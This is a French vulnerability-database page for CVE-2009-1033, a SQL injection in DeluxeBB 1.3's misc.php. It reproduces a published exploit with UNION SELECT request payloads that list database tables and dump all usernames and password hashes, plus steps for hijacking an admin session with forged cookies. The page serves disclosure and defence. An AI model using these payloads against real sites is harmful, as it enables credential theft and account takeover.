CVE-2009-1033 : Détail

CVE-2009-1033

SQL Injection
A03-Injection
0.51%V4
Network
2009-03-20
17h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in misc.php in DeluxeBB 1.3 and earlier allows remote attackers to execute arbitrary SQL commands via the qorder parameter, a different vector than CVE-2005-2989 and CVE-2006-2503.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 8240

Date de publication : 2009-03-17 23h00 +00:00
Auteur : girex
EDB Vérifié : Yes

# Author: girex # Homepage: girex.altervista.org # Date: 18/03/2009 # CMS: DeluxeBB 1.3 and prior # site: deluxebb.com # NOTE: - Works regardless of php.ini settings - This SQL injection will shows you username and md5 of ALL registered users of the site. - This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. ---------------------------------------------------------------------------------------- # Vuln description: # DeluxeBB suffers many SQL Injections. They are caused, in part, by the extract() function # used in header.php. I think this is a very bad practice. Attacker doesn't need # register_globals turned On, and in this case that i'm showing you magic_quotes # turned Off too. # file: misc.php lines: 461-464 if($order == "name") { $qorder = "ORDER BY username"; } if($order == "regdate") { $qorder = "ORDER BY joineddate"; } if($order == "posts") { $qorder = "ORDER BY posts"; } if($order == "lastpost") { $qorder = "ORDER BY lastpost"; } # This sequence of if does not provide an else.. # file: misc.php line: 490 $getsel = $db->query("SELECT * FROM ".$prefix."users ".$qfilter." ".$qorder." <== ".$sort." LIMIT ".$pageinfo[0].",".$pageinfo[1]); # An attacker can set an arbitrary value to the var $qorder if $order # has a value not expected. ---------------------------------------------------------------------------------------- # PoC: # I reccomend to use first of all this SQL Injection to retrieve all table's name # of the database thanks to informatin_schema. You can use it to retrieve the table prefix # of the CMS. GET [target]/[path]/misc.php?sub=memberlist&order=1& qorder=UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,table_name,16,17,18,19,20,21,22,23,24,25,26,27,28,29+ FROM+information_schema.tables%23&sort=ASC&filter=all&searchuser=.&submit=1 ---------------------------------------------------------------------------------------- # Real PoC: # This SQL Injection will shows you ALL usernames and password hashes of the CMS. GET [target]/[path]/misc.php?sub=memberlist&order=1& qorder=UNION+ALL+SELECT+uid,username,3,4,membercode,6,7,8,9,10,11,12,13,14,pass,16,17,18,19,20,21,22,23,24,25,26,27,28,29+ FROM+deluxebb_users%23&sort=ASC&filter=all&searchuser=.&submit=1 ---------------------------------------------------------------------------------------- # NOTE: to get admin's access edit your cookies: # memberid => victim's id # membercookie => victim's username # memberpw => victim's md5 ---------------------------------------------------------------------------------------- girex # milw0rm.com [2009-03-18]

Products Mentioned

Configuraton 0

Deluxebb>>Deluxebb >> Version *

Deluxebb>>Deluxebb >> Version To (including) 1.3

Deluxebb>>Deluxebb >> Version 1.0

    Deluxebb>>Deluxebb >> Version 1.1

    Deluxebb>>Deluxebb >> Version 1.2

    Deluxebb>>Deluxebb >> Version 1.05

    Deluxebb>>Deluxebb >> Version 1.06

    Deluxebb>>Deluxebb >> Version 1.07

      Deluxebb>>Deluxebb >> Version 1.08

        Deluxebb>>Deluxebb >> Version 1.09

          Références

          https://www.exploit-db.com/exploits/8240
          Tags : exploit, x_refsource_EXPLOIT-DB
          http://www.securityfocus.com/bid/34174
          Tags : vdb-entry, x_refsource_BID
          http://osvdb.org/52788
          Tags : vdb-entry, x_refsource_OSVDB
          http://secunia.com/advisories/34365
          Tags : third-party-advisory, x_refsource_SECUNIA